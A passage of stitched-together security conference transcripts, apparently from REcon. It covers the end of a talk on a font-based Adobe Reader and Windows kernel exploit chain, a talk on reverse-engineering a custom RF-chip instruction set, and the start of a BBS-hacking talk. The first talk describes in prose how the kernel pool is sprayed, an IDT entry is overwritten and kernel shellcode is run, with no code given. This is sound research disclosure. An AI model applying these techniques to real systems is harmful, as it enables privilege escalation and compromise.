is very convenient for us is that it is uninitialized during the interpreter runtime. So it holds whatever values were there when the structure was allocated. So this means that if we can spray the kernel pools such that we can control the whole structure, both the size and the data, then we can have, like, unlimited read and write capabilities in the Windows kernel inside of the char string program. So this is how we can, how we can reproduce this vulnerability provided that we have sprayed the kernel pool. It's just a matter of five instructions. Four of them are just providing arguments to restore instruction. So it's the registry index and then offsets within the transit array and the registry items, item and then the number of d words that we want to copy. After that, we just call the store instruction and, yeah, the vulnerability occurs. So if we think about how we can, how we can spray the pool, knowing that the allocation that we want to spray is within session page pool, we can look up some existing research and it turns out that Tarjee Mant was actually doing stuff like that back in 2011 for Windows 7. And what he did is he just called a single function called set class long pointer, which is responsible for setting a Unicode menu name of arbitrary length. So this causes Win32k to basically create an allocation of an arbitrary size and content, which should be a Unicode string. And it still works today in Windows 8.1. So I was experimenting for a little while trying to see what, how many calls would suffice to have this memory region sprayed in the right way. And I came up with this like nested loop to allocate, create allocations between a thousand and four thousand bytes for a hundred times. And then on all of my test machines, it would, the memory that we had to spray would be sprayed reliably with the data that we had provided. In this case, it would be a 01010101 value for the size and then an invalid kernel pointer for the data pointer. And after we have this and we spray the memory pool and actually invoke all of those instructions shown in the title that we can see that the memory is actually being referenced and we have a write operation here. So that was quite easy, I guess. We have now the, we now have a write and read and write with work condition. The question is what shall you read and write? Because we're on Windows 8.1 trying to subvert all exploit mitigations and as it turns out, Microsoft actually went into great lengths to make it impossible to get any information about the kernel address space from within user mode and specifically from within low integrity processes. And of course, we would like to use whatever resources we have right now and not burn another zero day on this. So there are still things that Windows doesn't prevent us from acquiring about the kernel address space. We have two instructions that are quite useful called as SIDT and SGDT, which just give us into user mode the addresses of the IDT and GDT CPU structures inside of the kernel address space. So they are available in user mode by default and they are really impossible to disable or restrict as an operating system without using virtualization technology. So they provide us a very convenient NTA, ASLR primitive in the world of Windows 8.1 kernel exploitation. So another interesting thing is that on CPU zero in Windows, the structure of GDT and IDT and how they are placed in memory is quite peculiar because we have GDT and for directly after that we have IDT, the first structure is of 80 hex bytes, the other one is of 1,000 bytes, storing 256 structures of size 16 bytes and then because of the fact that those two structures don't align with the size of the page of the small 4K page, we have a lot of unused memory after that. And of course IDT is responsible for storing function pointers. It's full of function pointers and some of those function pointers are user facing such as the CPU exception handlers which are the low entries of IDT. But if we thought about overwriting it, it's not really the safest choice because other processes may reference it as well. And the kernel may do it too, so something unexpected could happen but there are also some interrupts that are designed specifically for user mode usage such as the three shown below. One other problem that we might have to consider is that the function pointers are actually partitioned inside of the structure, so it's not just a 64-bit function pointer but it's actually spread inside of the structure. We could deal with this using the arithmetic instructions of the Truster program because, yeah, why not? It makes it possible for us to do this but we also could keep things simple and just use kind of a trampoline of the form jump register and we could find such a gadget within the same memory page as the function that we are overwriting and in that way we could just overwrite the low 16 bits of the address instead of the full one and this would be fully reliable. So the other important thing is that ADIDT has read, write and execute access on CPU zero. So it both has function pointers and is RWE so we couldn't imagine a better situation for us. We could just use the unused bytes after the ADIDT to store our shellcode. Of course we have to care about things such as that SIDT only provides 32 bits of IDTR in the compatibility mode that we are executing in so we have to switch temporarily to 64 bits in order to get the address. We can do it using this simple Macros in Visual Studio. I'm not going to delve into this but it's pretty straightforward to get the IDTR registry. So what we should do in the second stage DLL is just make sure that we are running on CPU zero using a single API function that spray the session page spool as I shown before and just load the kernel exploit font and let it do its work. And inside of the font char string, inside of the loaded font, we first copy the entire IDTR into the transient array then we adjust entry 29 which is the QRIS security check failure function so that it points instead of the function it points to a jump R11 gadget which resides in the same memory page and then write that back to the IDT. So yeah, I just wanted to make it a little ironic that we are using the security interrupt to elevate our privileges. And then we just save the modified part of the IDT entry somewhere after IDT and we write the kernel mode EOP shell code later on. So this is how it looks like during the execution of the char string. We have the IDT and we have the transient array. So first we copy all of IDT inside of the transient array then we make a backup of the IDT entry that we're overwriting. Later on we're just subtracting a value from the IDT entry inside of the transient array or maybe add some value to point it to the jump R11 gadget and after we have this we just put it inside of the IDT itself then put the X64 shell code into the transient array and copy it into the IDT or rather after the IDT inside of the unused memory region. And once this is done the only thing left for us to do is that we have to trigger the function pointer that we have overwritten with R11 set to the address of the shell code that we have put in kernel memory. And what the shell code does is the same thing as it did for 32-bit versions of Windows so it just elevates the privileges of the Adobe reader process and increases the active process limit. After that we also unhook create process A and spawn calculator. So I will show you the demo of this in my other virtual machine. Here I will just show you that this is 64-bit version of Windows. Yeah, as you can see here it is. Maybe I will run Magnifier as well. So we just double click on the Pock.PDF and yeah, okay there is another calculator and also let's see that it's elevated. Maybe not. But you can see that all of the Adobe reader processes and calculator are indeed elevated to anti-authority system. So we have our mission accomplished. We ended up with a single PDF file that attacks both Windows 32-bit and 64-bit, the latest one, Windows 8.1 and Adobe reader 11. And yeah, so we bypassed all of the mitigations that we wanted. Stack hook is by the design of the vulnerability ASLR because we only used addresses that we either leaked or requested from the CPU depth because we run all of the stages in executable memory, sandboxing with the vulnerability in the Windows kernel which was the same for 32-bit and a little bit different one for 64-bit and SMAP also because we run the shell code from executable memory in the kernel address space. And we maintained complete reliability because there was no brute forcing or guessing involved. All stages were deterministic, maybe except for the full spraying one and 64-bit but I think it should be pretty reliable as well. So the final thoughts are that even though fonts received a lot of attention from the security community, apparently they are not dead and this was shown by this presentation and the previous one as well, I'd rather say that there seem to be more of them being found each year. So there are also some more bugs from me coming out and some blog posts detailing the details of the other ones that I mentioned today. And it's also quite doubtful that they ever will completely cease to exist. So it's a good thing that some companies are actually putting some mitigations or some design changes in place to make those bugs unexploitable or just not worth exploiting because they are not in privileged contexts. And yeah, we should also be aware of the fact that shared native code bases still exist and this is obviously very scary in the context of software security and especially in the context of file formats that were developed 20 or 30 years ago and the code really hasn't changed that much since then. So even in 2015, with all of those mitigations that we have, it turns out that it's still a matter of just a single good bug to get a full system compromise. And with that, I thank you very much and I'm happy to answer any questions. When you threw that bug the second time in the kernel, you jumped to zero and that was your safe return. Did you have a cool way to safe return in Reader? No, I didn't because there was no reason to do it in the proof of concept, right? Because yeah, it's not really important for me to make Adobe Reader responsive after the exploitation stage, but it could definitely be done because there are several functions up the stack frames that can be returned to. So it's not really a problem, but I didn't do it for the proof of concept. Okay, no more questions. Thank you.
|
"Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild. Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs. In this presentation, we will outline the current state of the art with regards to font security research, followed by an in-depth analysis of the root cause and reliable exploitation process of a number of recently discovered vulnerabilities, including several full exploit chains. In particular, we will demonstrate how a universal PDF file could be crafted to fully compromise the security of a Windows 8.1 x86/x64 operating system via just a single vulnerability found in both Adobe Reader and the Adobe Type Manager Font Driver used by the Windows kernel."
|
10.5446/32736 (DOI)
|
Thanks for watching! So we have a short announcement from Travis Goodspeed, who will also introduce the next talk. How to do. So as is the tradition at recon and a few other neighborly conferences, we have the International Journal of Proof of Concept to get the fuck out. This is release number 12. We zero index, so this is our 13th release, and I believe our third or our fourth at recon, which is always generous enough to print these for us and to ensure that the printing is good. They're by the registration desk. Just swing by and grab one, but don't ask for permission and don't slow down and dear God don't mob them because their job is hard enough. The next talk is by David Karn. A buddy of mine from way back. Oh God, it has been that long. Yeah. So he's going to be telling you how to reverse engineer a black box instruction set. And by this, it's not like an instruction set that you don't know. This is one that nobody knows, but for which you have an example binary and the ability to make changes and observe the results in that binary and nothing else. So without further ado, David Karn. Thank you. I'm on VGA right now. The HMI wasn't detecting. I think. Okay, one second. All right. Well, let's see if I can get it not mirrored. Otherwise, I won't have my speaker notes and that won't go so well. There we go. All right. All right. So as Travis most kindly introduced, my name is David Karn. The talk I'm doing is reverse engineering instruction encodings from raw binaries. And this talk came about because I was doing some hardware reverse engineering on a custom core and a number of my software reverter friends were asking about how does one approach a problem like this. And so I don't have any fancy awesome software release for you today, although I will be putting the disassembler and assembler that I'm talking about here up online, but it's not that cool. The target isn't that cool. And all the techniques that I'm going to be talking about are relatively well known, but a lot of people apparently haven't seen them before, so hence the talk. In fact, they're so well known that on Monday, I was telling some friends on IRC about the talk I was going to be doing and they said, hey, didn't someone do something just like this at recon 2012? And much to my dismay, it turns out they did. So I'm going to begin with a citation to Chernov and Trozina with recon 2012 reverse engineering of binary programs for custom virtual machines. And while I'm on the subject of citations, I'll also mention effects of Fino Elite, building custom disassemblers, which was presented at 27C3 for reversing engineering step seven stuff. But my focus as opposed to those two is going to be more on microcontrollers and low level systems, things that are directly coupled to the hardware and where they were built for a custom reasons because they needed a custom hardware functionality as opposed to trying to deter analysis or to have a custom bytecode. And life's a little bit different down at those low levels. You find interesting things that you don't find in standard VMs. And in particular, this target that we're going to be looking at today is not really amenable to a lot of automated analysis techniques or wide statistical techniques. The plain text or image size that we have is just so small. And the fact that it's a mix of code and data tends to really reduce the signal to noise ratio for any kind of bulk statistical or bulk guess and test automated method. So today's example, I'm going to talk about a couple of techniques, the first of which is cheating because there's no point in reverse engineering an entire custom core just to find out you've discovered the 8051. Second is using firmware structure to your advantage. And then I'll touch briefly on static techniques and then followed by some dynamic techniques. And I've only got a 30-minute slot, so I'm going to be moving really, really fast and covering this at a very high level. If you want to know more details, please pigeon mohomey after or at lunch or something like that. And Chernov and Trozina cover the static techniques very well, so I'm going to just sort of cover one example of recovering code flow from that. So today's example is the ADF7242, and that's an RF transceiver IC. It's made by analog devices, and the family includes sort of multiple variants for different frequency bands. And inside of it is a custom core that interacts directly with the RF hardware, and it's interesting for some reasons I'll talk about later. But first I should mention that reversing this has no particular importance in the security scheme of things at all. So I'm not claiming this is an important security finding by being able to reverse engineer or break this. The only point of interest for going after this thing is I originally started on it because Mike Ryan was interested in using this for a better ZigBee sniffer. And it's interesting because it can be interfaced with a computer with only a low-cost SPI cable, like any FTDI cable that you might have laying around. And since you can execute firmware on the chip, you can do real-time operations, like real-time selective jamming or real-time channel hopping to follow a channel hopping transmitter without having to deal with and compensate for the USB latency. And of course, finally, it's interesting because it exists. It's, you know, and a binary out there that's in the custom instruction set is sort of reverse or bait. So as part of this project, I created a disassembler or assembler for the ADF 7242 and the similar families, and I'll post it later for anyone that wants it, if there is anyone. So the first hint we have from the datasheet is that the radio control and packet management of the part are realized through the use of an 8-bit custom processor and embedded ROM. And this is about all the information we have about it, that there's a packet manager with a processor, that it addresses two memory spaces, which is a program RAM and ROM in one memory space, and a bunch of data for various uses in the other. So that brings us to technique one, which is cheating. And as a rule of thumb, until proven otherwise, a custom core isn't custom. Most of the time, it usually just ends up being an 8051, a 10-silica extends a core, or a synopsis Arc series core. And the extends in Arc cores are really commonly found because they allow a processor designer to sort of check a bunch of options and have a core created for you that you can synthesize in your product and get a tool chain that knows how to use it. They support adding custom instructions as well, but they're based around a common core that, you know, HexRays has a disassembler for some of it, I believe. There's definitely disassemblers out there for some of those, and those serve as a starting point for 99% of what you'll need. And of course, you have your friends, BinWalk-A, which can sometimes identify an architecture for you if you're lucky. Strings is great, datasheet press material, don't neglect this stuff before you dive right into the fun technical work. And it is, as an example of why strings is better than one might think, there was a DSP that I was looking at once upon a time that was effectively a black box, this chip you just gave it a blob that the manufacturer said you had to. And they mentioned Extenza, which tells you it's an Extenza core, that it uses the Vectra DSP instruction set as well as the RTOS it uses. So don't neglect the simple stuff. But back to the sample that we have. We have a datasheet for the part, a loadable firmware module, and an app note describing what that loadable firmware module does. So that loadable firmware module extends the functionality of the 7242, so it does things like implementing addressing filtering. So it can automatically say, hey, this packet coming in, is this one that's of interest to the processor? Does the CRC match? Is it of a frame type I want? Okay, then interrupt the processor, but not otherwise. So it's great for low power modes. And this loadable firmware module we have is only 1369 bytes. So it's a very small sample in terms of having something to look at to figure out how it's behaving. And what we want to know is, first of all, what kind of machine are we dealing with? Is it a stack machine? Is it a register machine? What are the data path sizes inside of it? If it's a register machine, how many registers does it have and how large are they? We'd like to know whether the instructions are registered to register or memory to memory. We'd also like to know whether the memory layout is one unified address space that covers everything or whether it's separate address spaces for those two blocks that I described before. And we actually already have some hints from the diagrams that we had, that I'd shown before. And one example is that it showed an 8-bit data path coming from the program ROM. And that right away tells you it's probably not a processor that's using a weird, for example, like the PIC series, a 14-bit instruction word. Because if you're building custom silicon and if we assume the data sheet is telling the truth, there's no reason to actually use an 8-bit path from the ROM when you can just use a 14-bit one just as easily. So before I go on to the next slide, does anyone here remember bank switching code? Is anyone unfortunate enough to be still writing code for something that does bank switching or requires it? I guess, there's a couple of us here, but I guess most everyone's lucky. Bank switching is when you swap a bank of memory in and out because the processor address space isn't large enough to encompass the entire code that you want to run on it. And that shows up really, really well when you have a firmware file. For example, in this image that I'm showing you right here, you can see regular structure at power of two boundaries. And that's a real clear indication that whatever target you're looking at is using banking of some kind. A good heuristic is to count the number of zeros or Fs or repeating bytes right before power of two boundaries. And the lowest power of two that has that is probably the one that you're seeing banking occur at. But actually, these days, compilers have gotten so good at allocating code in these situations that I had to sort of beat the compiler over the head to make an image that would show up here. And so I recommend the heuristic method rather than visually. But there's other structure in firmware files that we can use to our advantage. And that's that they have to have entry points. So this is a loadable module. It's not a piece of firmware that runs right on the microcontroller, so it might be a little bit different. But still, either the ROM that's going to be talking to this loadable module or if it's just firmware for the raw firmware for the processor, the processor still needs to get to the part of the code that you want it to execute. So it's a very common feature, and you actually heard some of this being talked about in the last talk, to have a vector table. And the vector table tells the processor, hey, here's where you're going to execute in the case of a certain instruction, or sorry, a certain interrupt, or in, you know, for example, at reset. And it's very common to have this at the start of the end. And sometimes this table takes the form of a number of instructions that will perhaps jump to the code, or it might be a tightly packed table of addresses. And I did a brief survey of a handful of randomly selected embedded architectures, some of which are common, some of which are less common. And as you can see, the vast majority allocate a continuous vector table at the start of the end, with the exception of one which actually only ever boots from a boot loader, so it's a bit different. Some of them can relocate it after the start, but it still needs to be at a fixed point at PowerOn, which is generally one of those two places. Usually it's tightly packed, so it's not spread out over the firmware. It's usually tightly packed at one end or the other. And as I mentioned before, some of them represented at its addresses, others represented at its instructions. And if we go back to our sample, and this is the first time I've showed you the actual sample we had, well, what do we see? Right at the start of the file. So pattern of sort of what I would call stride two, stride two pattern right at the start, you know, two-byte chunks that are self-similar on a two-byte boundary followed by a series of three-byte chunks that are similar on that pattern. And if we assume that all of this is a vector table, well, it would be a bit of an odd one because you don't normally see a vector table that has different sized elements in it. It would be harder for the processor designer to implement. So let's think about what we know about vector tables. Well, if it's addresses, it probably doesn't make sense. We'll just look at the first part. Because if we look at those as big, end-yining coded addresses, well, they only differ by a single byte for each value, so that can't be branching to meaningful code. And if it's a little end-yining coded address, then they're spaced by 0x100 to 256 bytes, and then it runs off the size of the module we just loaded, so that can't be a sensible explanation either. And that leaves instructions for the other option. They probably aren't absolute jumps because we'd still have the problem about how you encode the jump destination. But what if they're relative jumps? And if these are two-byte relative jumps to a three-byte instruction, perhaps an absolute jump, then that would actually make sense for the one-byte difference, because relative jumps are usually added to the program counter in some way. And that turns out to be exactly what the case is for this particular processor. It's a two-byte relative jump to a three-byte absolute jump that goes somewhere else in the program. And this is a trampoline pattern. It's very common in embedded systems. Means the same thing as trampoline. In any other system you've looked at, it's one jump through another to get to the final destination that the first may not be able to reach. And if we look at the last few bytes on the absolute jump, well, we can start deciphering those as well. The lowest 12 bits all seem to differ. And they actually end up having address values that all point within the firmware module that we've loaded. They're all within the size bounds of what we're going to load. So this makes sense. It's a good sign we're on the right path. But we can be a bit easier than this rather than trying to reverse it or analyze it from the bit patterns. The simplest approach is just to make a histogram. Just take the last two byte values and plot it on a chart and see where they go. And you get sort of two main groupings in this distribution. And you see they're spread out over at sort of around zero and around the 32K mark. And you look at something like this and you say, well, I really don't think that this processor has a 16-bit address space. There's no need for it to be using a full 64K of address space. What's probably more likely is that the top, the 15th bit, is actually a selection. It differentiates between two different instructions that both take an absolute address. And so the hypothesis is that the 15th bit is part of the encoding, not the address. And if we follow that hypothesis, we see something that looks much more reasonable. And I want to emphasize, I forgot to mention earlier, these histograms are of all byte patterns that match, you know, that start with an OF byte. And so that's basically based on every single OF sequence in the file. And it's a very small file. So you don't see a lot of noise. Normally you'd have a lot of random noise on the baseline. But this is such a small sample that you don't see it. So this is all things that match. And you see it collapses right down into a nice distribution. And that's all within the address space of the program ROM that's, or within the size of a potential program ROM plus the loadable module. So we have a pretty good guess at, you know, now relative jump, absolute jump, and now possibly what we think might be a call. Because if you look at, basically, Silicon costs money. Unlike a malware VM where they're trying to deter you from analyzing it, the Silicon is all about how can I build it in the simplest and cheapest way that it'll work. And an absolute jump is really similar to an absolute call. The only difference is that the absolute call has to push the return address onto the stack. So it makes sense just to have a single bit that says, hey, you're going to have to push the return address when you execute this. And once we have a call, we can find RET and the value for return. And so functions normally look something like this. You've got a function, a return address, followed by another function. And indeed, this is one of the heuristics that was proposed by Chernov and Trozina at Rekon 2012, except they were going the other way around using RET to find call as opposed to vice versa. But unfortunately, a lot of embedded systems aren't quite that simple or as simple as the picture I've shown. For example, in RME, you have constant pools where you have read-only data allocated, or in some cases rewrite data I've seen out of one compiler, allocated right after the function body. And in some cases, you also have alignment bytes, and that might be because the processor requires it, because that's what the ABI calls for, or sometimes that's just what the compiler does for no particularly good reason. So thankfully for us, the ADF 7242 is pretty simple. And so this is a histogram of the byte value immediately before a call target. So you look where a call points and then make a histogram of all of the byte values immediately before that. And there's one byte that sticks out as being by far more prevalent than any other immediately before we're a call may point. And that's byte value OXA, which is also the new line or return character. And if the analog devices guide that originally built this core is out there, it's particularly nice that you made a return instruction, the return character. It's very convenient. So while this works for the naive example here where you don't have any spacing between functions or paddings, a heuristic that works quite well, and I've used on other systems where it was a bit more complex, is to do sort of a weighted histogram where first you eliminate the padding, and you can figure out what that is because the padding is usually the same. And then weight the count of the byte based on how far it was back. So you have like a 10 byte look back window or something like that before the target, and then weight those in. And that usually ends up with red in the top three or so. So that's worth trying as well. But there's other function structures that we can use to our advantage. Functions generally need to save and restore cally saved state. And some embedded arcs save it for you, but most are pretty simple. And this is where on this particular target that I stopped being able to use fancy histograms and analyses because the sample size is just too small. Everything just gets lost in the noise floor, and there's no point in looking anymore. But so the saving of state is usually something like a push and a pop pair at the start and the end. And some manual analysis, just looking at functions, identifies a pair of byte values that either always occur together or never occur at the start and the end of the instruction. So you have a pretty good clue that that is involved in saving state of some kind. And I'm not going to walk through the whole trial and error process of this entire core because, A, I don't have the time and, B, you'd all be bored out of your minds. So I'm going to sort of leave the static analysis process here for now and just touch on a couple other points before I move on to some dynamic stuff. Remember, we can cheat. In the loadable processor module app note that they had for this particular firmware file, it had a number of memory locations. And those memory locations were used to configure the address matching. So you knew that those memory locations would contain an address. And therefore, those addresses or memory locations had to be loaded somewhere inside this so that they could be used. So we can go constant hunting. Go hunting for the binary value of the constants of those memory locations. And that's an immediate real quick jump to move immediate followed by move registered indirect. And you find those right away. And nothing says that the processor has to use the same memory mapping as your external configuration interface does, which is over spy in this case. But it's unlikely that they would do anything different because if you do something drastically different, you need two separate sets of address decoders for the same blank of memory. And extra address decoders cost silicon and silicon cost money. And they're using a custom core in the first place probably because they want it to be cheap. Or they need something very high performance that they couldn't do with something off the shelf. So this is the end of what I'll talk about for static methods. But using similar guess and check and validate mechanisms as I described before got us, conditional jumps, well conditional relative jumps and always relative jumps, absolute call, absolute jump, return, as well as move immediate, register to register transfers, register indirect memory, read and write, as well as some ALU operations, which would be ads subtract, compare, bit test, bit clear. And all that came out through sort of guess and check style methodologies. So remember when you're doing this kind of thing is that code is sane. Values shouldn't be written to a register and then promptly overwritten. The ALU and registers shouldn't behave in one way for the vast majority of instructions and then differently for one instruction alone. There shouldn't be a huge number of distinct encodings for the same operation that you think is occurring. And values shouldn't be presumed to teleport between registers or from registers to memory or vice versa. Ironically the ADF 7242 breaks through to those four rules. So you can't take them as a hard and fast rule because this core is very tightly coupled, some hardware around it. But those are some general rules of thumb you can use to figure out if you're on the right track. And in fact, while I was putting this deck together, I was reminded of an attempt to decipher linear A. And linear A is a as yet undecyphered ancient Greek script that was used for writing down their spoken language. And a reviewer of one proposed translation remarked that the quality of a new translation could be judged by how many or rather how few new gods hitherto unknown to history that the translation proposes. And I think the same can be said for binary analysis except replace gods with nobs. If you've got five or six different things that you think are probably a nop because you can't figure out what else they might be, you're probably on the wrong path. So this is our particular all you need for a test bench. This is all you need. I've put the digit key parts up there if you want it, but you can find them both on mouse or any other distributor. All you need is an FTDI cable and the little dev board you can get. So it's really easy to hook up to your computer. I've actually got it with me today. If anyone wants to see it after the talk, just come bug me. And as an aside, dumping the internal ROM on this was really, really easy. So this is the documented command set of the spy interface that you use to interface with the processor. And I sort of wonder what this undocumented area of the command set was if anyone has any guesses about what that might get one access to. It was very easy to dump the ROM so fast to say. So moving on to dynamic methods, and I'm going to have to move really fast because I think everyone wants to go for lunch in six minutes, and I know I won't keep you through that. It's basically make yourself an oracle and then proceed to query it until you learn all sorts of interesting things. A processor has state, and this is an example of the state that I knew about at the point I stopped my static reversing of it. I had three registers of various sizes. I, of course, knew the instruction pointer and the RAM. And you, when you execute some instruction on the processor, well, obviously something happens to the state, otherwise it wouldn't be a very useful instruction. So observing this would be trivial if we had a debugger, because you could just single step it and then dump all the values. But in this case, we don't even know if a debugger exists, and if it does exist, we don't know how to use it. So the goal for a test bench to try and go after these things is to set up as much state as possible on the core using the instructions we already know about, which is move immediate. Run an instruction that we don't know what it does, collect all the state that we can, and then compare it to see, you know, compare it against our model of what that instruction should have done, excuse me. And for the ADF 7242, this looks like just generating a test bench program, you know, compiling on the host with a little assembler. Uploading and running that test bench on the hardware, and that test bench sets up the state with the move immediate instructions, as I said. And then the test bench writes the state to that RAM window that I discussed very briefly, because I'm moving pretty quick in this 30 minutes, writes that state, the host reads it back, and then compares it. And one challenge that you have, especially when you only know a little bit about the processor, is that it can be very hard to retrieve some state without clobbering others. For example, I had found that the processor had a condition flags register, because I saw some things working with it, moving nibbles there that were then tested and branched upon. And I knew how to read the condition flags register, but to do so would clobber a register. And similarly, saving that register would trash the condition flags register, so I couldn't get both at the same time. And it's obviously a simple solution to that, is just to make two test benches, one that gathers one part of the state, and one that gathers the other, and then put it back together in software, so you can see the entire state that changed. And when you run a test bench step like that, you then have to characterize the output. The first output is no effect, and that can be that you're actually a nop, but really when you see a whole bunch of things that have no state, it probably means that there is some state that you don't know about. There's something that you haven't realized is in there yet that it's actually being changed. Sometimes it's a constant effect, and the most simple of that is a move immediate or a clear instruction. But it also could be unset or unchanged input state. If there's input state that you're not setting up ahead of time, and it's always remaining constant under your test bench runs, then that would also appear to be a constant instruction. There's deterministic effects. For example, an ALU operation where you add two input registers that you control, and you can predict what the output value will be. There are nondeterministic effects, which only appear nondeterministic because hardware usually is deterministic. So unless you think for a good reason that there's already RAND or RDTSC equivalents down in your particular target, it probably means there's input state that you're not controlling yet. And finally is crash, is a crash condition. And that means that you've either found a new piece of control flow that you can't, that you don't know what it's doing, or you've found an instruction that's either unimplemented that results in a processor hang, or you've found something weird. And I'll talk about one of the weird things in this chip that I came across in a little bit. And I strongly recommend building a validation test suite. And that's model each instruction. And then what you do is you have the test suite run such that it compares the execution of the model versus the execution in the hardware. And you should run each test with multiple random input vectors and make sure that you're always predicting the correct output. And something that's really important to do is make sure that you're not trying to predict the entire state, just predict the differentials. So that as you discover a new state over time that you don't necessarily know about at the beginning, then you can just rerun the entire test bench with that new state being set up at something random and see if your predictions still hold. For example, that would allow you to detect the difference between an add and an add see. Initially you might think both they're initially add, they're both add operands, but if there's a carry bit that you don't know to set and you find it later on, then rerunning the test bench will identify, hey, I missed something there, and I should go back and check it. So I'll talk a little bit about the weird and wonderful things I found there. I think I'm down to one minute, so I'm going to get through this real quick. It ends up having two separate address spaces. Program memory is addressed with a 13-bit program counter, and data is addressed with an 11-bit data. So the RAM for data storage is an 11-bit address bus. Internally, it has these registers, and these are the ones I know about so far. And I'm fairly certain those are most of them, but you never know with this kind of system. So there's a couple of registers, which I'm calling general-purpose registers, though they're not really general-purpose. I don't have a better name for them. There's two 10-bit registers and a 16-bit register. R1 is usually used as the value in a load store operation, whereas R2 is usually used as the address. A and R1 are usually used as a pair for ALU ops, so I originally called it A for accumulator, but it turns out not to be that after a bunch of reverse engineering. And there's also two really weird registers, one of which is a packet pointer register, which is sort of a register indirect access with hardware-based offset based on the current packet. It's busy spitting out the RF transmitter. And there's also a specialized loop counter register, which is only ever used by three instructions, which is set loop counter, read loop counter, and decrement and jump if not zero. So that particular register is attached by anything else. So it's sort of weird down at the instructions at level, but it gets weirder. There's some directly coupled IO instructions. For example, there's an instruction that appears to allow turning on and off the power amplifier or setting it to a particular level. There's an instruction that directly enqueues some bits to be transmitted. And some of this, there's also blocking instructions to match those. For example, block the core until this particular hardware function completes, like, for example, transmitting a byte out the RF port. And ironically, because of the way that's built and it's encoded, you can actually block the core until any condition bit is set. So you can actually do block until not zero, which is not an operand you ever find in the disassembled binary because it's not terribly useful. Once the core is halted, waiting it for it to become non-zero, nothing's ever going to make it non-zero. There's also specialized communications instructions, for example, bit reverse and CRC baked in. And you see a lot of these kind of weird instructions in these special purpose processors. In other ones I've looked at, I've seen instructions for accelerating S-boxes for cryptography, Viterbi decode acceleration, bit shuffle and extract, stuff for accelerating forward error correction. So there's a lot of really interesting things you find down there. And so the state of the tools today for this particular core, I have a disassembler that covers the vast majority of the instruction space. The ones that I don't know about are never appear in the disassembly I have. So the best guess I have is that they're either unimplemented encoding space or they do something that I haven't found state for yet. I have a basic assembler as well as the disassembler, of course, and a loader and IO library for playing with this thing. And I'm going to post it soon at github.com slash David Karn. It's not going to be while I'm at recon because I didn't bring my SSH keys. So thanks for coming out to listen and I guess any questions or does everyone just want to leave for lunch? It is.
|
Have you ever come across a firmware image for which you couldn’t find a disassembler? This talk will cover reverse-engineering techniques for extracting an instruction encoding from a raw binary with an unknown/custom instruction set. The main focus is on static techniques and features of firmware images that you can use to your advantage–but some dynamic techniques will be covered as well.
|
10.5446/32740 (DOI)
|
So this is probably, in my opinion, this is the perfect talk for the end of the first day. So who here was on BBS's like back in the day? Okay, so all of you I'm sure have wondered at some point in your lives if like, what if we knew then what we know now? I think all of us have wondered that. So I'm happy to introduce Derek Soder and Paul Metta from Silence. So cool talk. Thanks. That sounds great. Yeah, cool. Well, so yeah, I'm Derek and I'm Paul and I'm glad you guys are all here. BBS era is something most of us remember and have nostalgic memories about and I thought we might talk a little bit about the inspiration for the talk to begin with. Yeah, you know, it started as an April Fool's joke, but like a lot of things that started as jokes, it ended up getting serious. And we decided, you know, around about the time that the recon CFP opened, hey, wouldn't that make a fun talk, you know, something a little exotic. And yeah, we did end up actually preparing an April Fool's Day press release that just kind of announced one of the vulnerabilities like as though it were as though it were Heartbleed or Ghost or something. We didn't end up making a logo for it because, you know, just gifts back then and gifts were still patented back then, I think. So anyways, that was basically the inspiration and looks like they accepted the talk and so now you'll get to hear all about it. All right, so the modem era before the internet and everything was one-to-one connection. So you had one modem, you could only talk to one other computer. And yeah, for the few of you who are familiar with VBSes, welcome back. It's good to see you. For everybody else, we're going to talk just a little bit about what is a VBS. So VBS is one of the things on this screen. We're going to be hacking one of them. Point to whichever one you think it is. Go on, don't be shy. Okay, well. All right. I see just a few of you all are participating and if you're pointing at the kitty, you win. Congratulations. So the server-side software that we were looking at is called Wildcat. And Derek, I know you're going to tell me something about Wildcat. Yeah, the funny thing about Wildcat is Wildcat is wild. There you go. There's your anachronism. Take that box. Yeah, take it away. So we're looking at essentially the architecture of how they talk to each other and it's over a phone line. So everyone from the 90s has heard that sound when you pick up a phone and someone's using the Internet. Yeah, call waiting is a bane of my existence. And so there is another side to it. There's also the client-side and the client-side ends up rendering whatever the BBS sends back. And that leads you to Legend of the Red Dragon. Anybody? Awesome. Good times. That was my formative years. So yeah, you've got exactly one computer, yours, connected to exactly one computer, the SysOps. Hopefully the SysOps isn't sitting there staring at everything you're doing all the time, but they totally could if they wanted to. And yeah, contrast that with today where everything is connected to everything all the time and we've come a long way. They're probably still watching, but... And now it's not just one SysOps. So looking at this, we wanted to kind of ask the question because, well, it's relevant. Our BBS is still relevant today. For scale, in the last 30 days or so, there have been 10 new BBSes that have gone up. Well, welcome to the internet. Wrong term. And I think in comparison, there have been roughly 16 million new websites per month or so. So the scale here, you've got to take into account. But there are still new BBSes going up and people still use them. And I looked it up, actually, as of 2015, there's still 2.1 million people in America on dial-up. I got nothing to say about that. I doubt they're on BBSes, but I thought it was kind of interesting. So now that you all know about everything about BBSes, now here are the programs that we're going to attack. Wildcat being the BBS software, the server. And then Ripterm being the client, it's the terminal program. Ripterm typically calls Wildcat. And with the sound that goes something like, it's working. Is that warm you right here? We clipped it for conciseness. It actually ran on for like a minute or so. So we thought we'd look at back then and today. Who knows where this guy's from, the blue guy? Yeah, thank you. And the comparatively orange guy? Yeah, there we go. The past and the present, united in one slide. So when it comes to software, what did we use back then and what do we use today? So back then people would boot from a disk. And today we really have to use DOSBox or if you're running on like 2003, you can use TVDM which, well, to debug back then. Yeah, remember DOSDebug? It doesn't even have break points. Oh, did I just step on something? It's not supposed to look that way. Okay, well, now today the specific content's unimportant. Today we use WinDebug mostly or GDB if you're on Unix and DOSDebug which we actually found to be quite useless. That's a 